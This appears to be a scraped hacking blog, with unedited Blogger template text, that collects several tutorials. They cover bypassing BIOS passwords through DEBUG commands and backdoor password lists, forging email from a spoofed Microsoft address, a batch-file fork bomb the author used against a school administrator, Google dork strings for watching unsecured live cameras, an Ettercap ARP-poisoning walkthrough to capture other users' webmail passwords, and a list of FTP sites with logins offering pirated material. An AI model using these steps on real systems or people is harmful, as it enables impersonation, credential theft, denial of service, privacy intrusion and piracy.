This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Basic BIOS password crack

biosThis is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:

Get DOS prompt and type:



Code:

DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter


Restart the computer. It works on most versions of the AWARD BIOS.


Accessing information on the hard disk


When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.


Standard BIOS backdoor passwords

The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer’s backdoor passwords:


AWARD BIOS

AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet


AMI BIOS

AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder


Other passwords you may try (for AMI/AWARD or other BIOSes)


LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj


Note that the key associated to “_” in the US keyboard corresponds to “?” in some European keyboards (such as Italian and German ones), so — for example — you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.


Flashing BIOS via software


If you have access to the computer when it’s turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory. However, it might happen you don’t have one of those programs when you have access to the computer, so you’d better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You’d better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:


AMI/AWARD BIOS



Code:

O 70 17
O 71 17
Q


PHOENIX BIOS



Code:

O 70 FF
O 71 17
Q


GENERIC

Invalidates CMOS RAM.

Should work on all AT motherboards

(XT motherboards don’t have CMOS)



Code:

O 70 2E
O 71 FF
Q


Note that the first letter is a “O” not the number “0″. The numbers which follow are two bytes in hex format.


Flashing BIOS via hardware

If you can’t access the computer when it’s on, and the standard backdoor passwords didn’t work, you’ll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.

Using the jumpers


The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for “switching a jumper” I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard. To find the correct jumper you should read the motherboard’s manual.


Once you’ve located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.


If you don’t have the motherboard’s manual, you’ll have to “brute force” it… trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don’t know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.


If after flashing the BIOS, the computer won’t boot when you turn it on, turn it off, and wait some seconds before to retry.


Removing the battery


If you can’t find the jumper to flash the BIOS or if such jumper doesn’t exist, you can remove the battery that keeps the BIOS memory alive. It’s a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you’ll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I’d suggest you to remove it for about one hour to be sure, because if you put it back when the data aren’t erased yet you’ll have to wait more time, as you’ve never removed it. If at first it doesn’t work, try to remove the battery overnight.


Important note: in laptop and notebooks you don’t have to remove the computer’s power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.


Short-circuiting the chip


Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.


Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.

CHIPS P82C206 (square)


Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).



Code:

       gnd
74
|__________________
5v 75--| |
| |
| |
| CHIPS |
1 * | |
| P82C206 |
| |
| |
|___________________|
| |
| gnd | 5v
12 32


OPTi F82C206 (rectangular)

Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).



Code:

    80              51
|______________|
81 -| |- 50
| |
| |
| OPTi |
| |
| F82C206 |
| |
100-|________________|-31
|| | |
1 || | | 30
3 26


Dallas DS1287, DS1287A

Benchmarq bp3287MT, bq3287AMT

The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can’t flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.


CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.

The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can’t be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.



Code:

         __________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21 RCL (RAM Clear)
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13


NOTE: Although these are 24-pin chips,

the Dallas chips may be missing 5 pins,

these are unused pins.

Most chips have unused pins,

though usually they are still present.


Dallas DS12885S

Benchmarq bq3258S

Hitachi HD146818AP

Samsung KS82C6818A

This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818. Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.

Short together pins 12 and 24.



Code:

5v
24 20 13
|___________|____________________|
| |
| DALLAS |
|> |
| DS12885S |
| |
|__________________________________|
| |
1 12
gnd


Motorola MC146818AP

Short pins 12 and 24. These are the pins on diagonally opposite corners – lower left and upper right. You might also try pins 12 and 20.



Code:

          __________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13


Replacing the chip


If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It’s a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you’ll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you’ll then plug the new chip, in the eventuality that you’ll have to change it again. If you can’t find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer’s website to see if there’s the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.


Important


Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.


Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you’ll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn’t see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can’t find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .


Key Disk for Toshiba laptops


Some Toshiba notebooks allow to bypass BIOS by inserting a “key-disk” in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it’s not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for “KEY” :) followed by two zeroes). Once you have created the key disk put it into the notebook’s drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You’ll enter the BIOS configuration where you can set a new password.


Key protected cases


A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.

How to send fake email / Email Forging

emailMost of the email forging tutorials on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain. But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorized access. Also many of the websites offer you to send fake email from their sites where none of them work. So we have to run our own SMTP server on our computer to successfully send a fake email. SMTP server is a simple software program which can be installed on your computer in few seconds. SMTP server allows you to send fake email right from your desktop easily and effectively. Download QK SMTP server HERE. This is the SMTP server i am using in my tutorial. Once you download and install the server on your comp then you are all set to send fake email successfully.




PART A: CONFIGURING SMTP SERVER


Once you have installed the QK SMTP server on your comp you must perform the following configuration.


1. Click on “Settings” button on the main screen,the Settings window pops up


2. On Settings window click on “Basic Parameter” tab


3. Set binding IP to “127.0.0.1?


4. Set port to “25?



PART B: SENDING FAKE EMAIL (EMAIL FORGING)


1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running). If it is already running then this step can be ignored


2. Goto command prompt(Start-Accessories-Command prompt)


3. Type exactly as follows


C:>telnet 127.0.0.1 25


Here 127.0.0.1 is the default IP of every computer.25 is the port number. SO you are connecting to the SMTP server running on your own computer.This step is very important to send fake email.


NOTE: The IP 127.0.0.1 should not be substituted by any other IP.


Heres the snapshot of what you see after step 3. Click on it to enlarge


qk_smtp-1


4. After typing the telnet command in the command prompt you get entry to the server which displays the following message. The response of a OK SMTP server is given below. Message within Green color is only explanation.


220 Welcome to QK SMTP Server 3


helo hacker (Type helo & any name followed by space)


250 Hello hacker (Server Welcomes You)


mail from:billg@microsoft.com (email ID can be anything of your choice. This is the ID from which fake email appears to have come from)


250 billg@microsoft.com Address Okay (Server gives a positive response)


rcpt to:admin@gmail.com (Type any valid recipient email address)


250 admin@gmail.com Address Okay (Server gives a positive response)


data (type this command to start input data)


354 Please start mail input


From:Gates <billg@microsoft.com>


To:admin@gmail.com


Date:Sat Jan 5,2008 9:45 PM


Subject:Test to send fake email


You can create as many headers followed by the “:” symbol.


NOTE:HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data


<HERE IS YOUR DATA>End the body of email by pressing [ENTER] .(dot) [ENTER]


250 Mail queued for delivery (Sever indicates that the email is ready for sending)


quit (Type this command to quit from server)


221 Closing connection. Good bye.


Connection to host lost


(You will get the above 2 lines of message after typing “quit” command)


(Your fake email is sent to the recipient)


*****END OF EMAIL FORGING*****

How to make a Fork Bomb (Rabbit Virus)

fork bombIntroduction


Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.


A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.


Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.


Background


Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.


The code


Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt


One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…


Blocks of code should be set as style “Formatted” like this.


:s


START %0


GOTO :s


Have fun guys and do leave your feedback about this article!

How to make a Virus File Undetected By Antivirus Programs


This video tutorial explains you in detail “how to make an infected file undetectable” just by doing some splitting and hexing!!

How to Hack into a Live Security Camera

3684234620 14174a66d9 How to Hack into a Live Security CameraWell this is an interesting article. It is a sub-section of a Hacking Technique known as “Google Hacking”. All what we are looking at are unsecured cams from around the world that are interfaced with the internet. So how do you find such cameras. Just google these following strings and select any result. Whoa, you can see a live cam on your PC screen!! The strings are given below:




  • inurl:”CgiStart?page=”

  • inurl:/view.shtml

  • intitle:”Live View / – AXIS

  • inurl:view/view.shtml

  • inurl:ViewerFrame?Mode=

  • inurl:ViewerFrame?Mode=Refresh

  • inurl:axis-cgi/jpg

  • inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)

  • inurl:view/indexFrame.shtml

  • inurl:view/index.shtml

  • inurl:view/view.shtml

  • liveapplet

  • intitle:”live view” intitle:axis

  • intitle:liveapplet

  • allintitle:”Network Camera NetworkCamera” (disconnected)

  • intitle:axis intitle:”video server”

  • intitle:liveapplet inurl:LvAppl

  • intitle:”EvoCam” inurl:”webcam.html”

  • intitle:”Live NetSnap Cam-Server feed”

  • intitle:”Live View / – AXIS”

  • intitle:”Live View / – AXIS 206M”

  • intitle:”Live View / – AXIS 206W”

  • intitle:”Live View / – AXIS 210?

  • inurl:indexFrame.shtml Axis

  • inurl:”MultiCameraFrame?Mode=Motion” (disconnected)

  • intitle:start inurl:cgistart

  • intitle:”WJ-NT104 Main Page”

  • intitle:snc-z20 inurl:home/

  • intitle:snc-cs3 inurl:home/

  • intitle:snc-rz30 inurl:home/

  • intitle:”sony network camera snc-p1?

  • intitle:”sony network camera snc-m1?

  • site:.viewnetcam.com -www.viewnetcam.com

  • intitle:”Toshiba Network Camera” user login

  • intitle:”netcam live image” (disconnected)

  • intitle:”i-Catcher Console – Web Monitor”


Happy Cam Hacking Guys!! :-)

Sniffing Tutorial

3744959095 82778f4802 Sniffing Tutorial

Hi, Today I am posting a tutorial on Sniffing which can be done using “BACKTRACK” . You can download Backtrack from here.


I prefer using Backtrack 3.0 Final version.


Well lets start with sniffing. If you don’t know what sniffing is, then click here.


Tools you need are:


Ettercap

nano


1. For SSL Dissection support (hotmail,gmail), you need to do this:

Open a shell, type: “nano /usr/local/etc/etter.conf”, use the down arrow until you reach “redir_command_on/off”, look at the linux part, your gonna need to uncomment:



Code:

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


to:



Code:

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


after your done, press F2, Y, Return.


Now boot Ettercap: Menu –> Backtrack –> Spoofing –> Ettercap

Go to: Sniff –> Unified Sniffing –>ethX(what interface you want to sniff).

Then Press: Ctrl+S to scan hosts.

Then Go to: Mitm –> ARP poisoning, select sniff remote connections, and press ok.

Then Go to: Start –> Start Sniffing.


For an Example, Walk to another pc, go to your internet email account (Hotmail, Gmail), and log in, you will be asked to trust the certificate, Trust it, and watch your sniffing computer, the username and password should appear.


When your done, go to Start –> Stop Sniffing, And go to Mitm –> Stop mitm attack(s)

Download Free Softwares, Games, Movies and lot of Hacking Stuff from 50+ FTP Sites

3752370229 c162e52d2c Download Free Softwares, Games, Movies and lot of Hacking Stuff from 50+ FTP Sites

Internet definitely has several unheard places also known as underground websites, few of these website offer users 100s and 1000s of softwares, games, movies and lot of Hacking Stuff for downloads. Though these sites are pretty tough to find, I was able to unearth more than 50+ FTP sites that allow users to download softwares, games, movies and lot of Hacking tools for free.


Here is a list of 50+ FTP sites that will allow you download content for free. Don’t forget to share and bookmark this page so that everyone can take advantage of it.


1. ftp://ftp.freenet.de/pub/filepilot/

2. ftp://193.43.36.131/Radio/MP3/

3. ftp://195.216.160.175/

4. ftp://207.71.8.54:21/games/

5. ftp://194.44.214.3/pub/music/

6. ftp://202.118.66.15/pub/books

7. ftp://129.241.210.42/pub/games/

8. ftp://clubmusic:clubmusic@217.172.16.3:8778/

9. ftp://212.174.160.21/games

10. ftp://ftp.uar.net/pub/e-books/

11. ftp://129.241.210.42/pub/games/

12. ftp://193.231.238.4/pub/

13. ftp://207.71.8.54/games/

14. ftp://194.187.207.98/video/

15. ftp://194.187.207.98/music/

16. ftp://194.187.207.98/soft/

17. ftp://194.187.207.98/games/

18. ftp://ftp.uglan.ck.ua/

19. ftp://159.153.197.74/pub

20. ftp://leech:l33ch@61.145.123.141:5632/

21. ftp://psy:psy@ftp.cybersky.ru

22. ftp://130.89.175.1/pub/games/

23. ftp://194.44.214.3/pub/

24. ftp://195.116.114.144:21/

25. ftp://64.17.191.56:21/

26. ftp://80.255.128.148:21/pub/

27. ftp://83.149.236.35:21/packages/

28. ftp://129.241.56.118/

29. ftp://81.198.60.10:21/

30. ftp://128.10.252.10/pub/

31. ftp://129.241.210.42/pub/

32. ftp://137.189.4.14/pub

33. ftp://139.174.2.36/pub/

34. ftp://147.178.1.101/

35. ftp://156.17.62.99/

36. ftp://159.153.197.74/pub/

37. ftp://193.140.54.18/pub/

38. ftp://192.67.63.35/

39. ftp://166.70.161.34/

40. ftp://195.161.112.15/musik/

41. ftp://195.161.112.15/

42. ftp://195.131.10.164/software

43. ftp://195.146.65.20/pub/win/

44. ftp://199.166.210.164/

45. ftp://195.46.96.194/pub/

46. ftp://61.136.76.236/

47. ftp://61.154.14.248/

48. ftp://62.210.158.81/

49. ftp://62.232.57.61/

50. ftp://212.122.1.85/pub/software/

51. ftp://193.125.152.110/pub/.1/misc/sounds/mp3/murray/